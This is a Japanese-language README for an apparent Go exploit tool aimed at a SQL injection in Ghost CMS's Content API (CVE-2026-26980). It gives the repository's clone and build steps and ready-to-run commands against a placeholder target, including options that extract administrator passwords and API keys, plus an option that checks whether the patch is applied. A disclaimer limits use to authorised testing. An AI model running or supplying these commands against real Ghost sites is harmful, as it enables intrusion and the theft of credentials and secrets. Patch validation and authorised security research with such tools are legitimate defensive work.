
Ghost CMS Content API SQLインジェクション(CVE-2026-26980)用のGoベースのPoC。脆弱性を検証し、管理者資格情報とAPIシークレットを抽出し、影響を受けるバージョン3.24.0~6.19.0のパッチを検証する。
このリポジトリは、CVE-2026-26980 で説明されている Ghost CMS Content API SQLインジェクションの脆弱性を実証および検証するための Go ベースの概念実証ツールです。実装はメインの Go ソースファイルに実装されたエクスプロイトフローに基づいており、許可されたセキュリティ研究およびテストのみを目的としています。
この PoC は、Content API スラッグフィルターの順序処理の脆弱性の影響を受ける Ghost CMS インスタンスを対象としています。次のことが可能です:
git clone https://github.com/gagaltotal/CVE-2026-26980-Ghost-CMS-Api
cd CVE-2026-26980-Ghost-CMS-Api
go mod init CVE-2026-26980-Ghost-CMS-Api
go mod tidy
プロジェクトルートから、以下のコマンドでバイナリをビルドします:
go build -o ghost-sqli ghost_sqli_cms.go
OR
go run ghost_sqli_cms.go


./ghost-sqli --help

./ghost-sqli --url http://target.example:2368
./ghost-sqli --url http://target.example:2368 --extract-password --extract-api-key
./ghost-sqli --url http://target.example:2368 --validate-fix
./ghost-sqli --url http://target.example:2368 --content-key "your-content-api-key"
./ghost-sqli --url http://target.example:2368 -v
このプロジェクトは、教育および許可されたセキュリティ評価目的のみで提供されます。所有しているシステム、テストを許可されているシステム、または管理された環境で評価しているシステムのみに対して使用してください。第三者のシステムへの不正アクセスまたは悪用は違法であり、該当する法律に違反する可能性があります。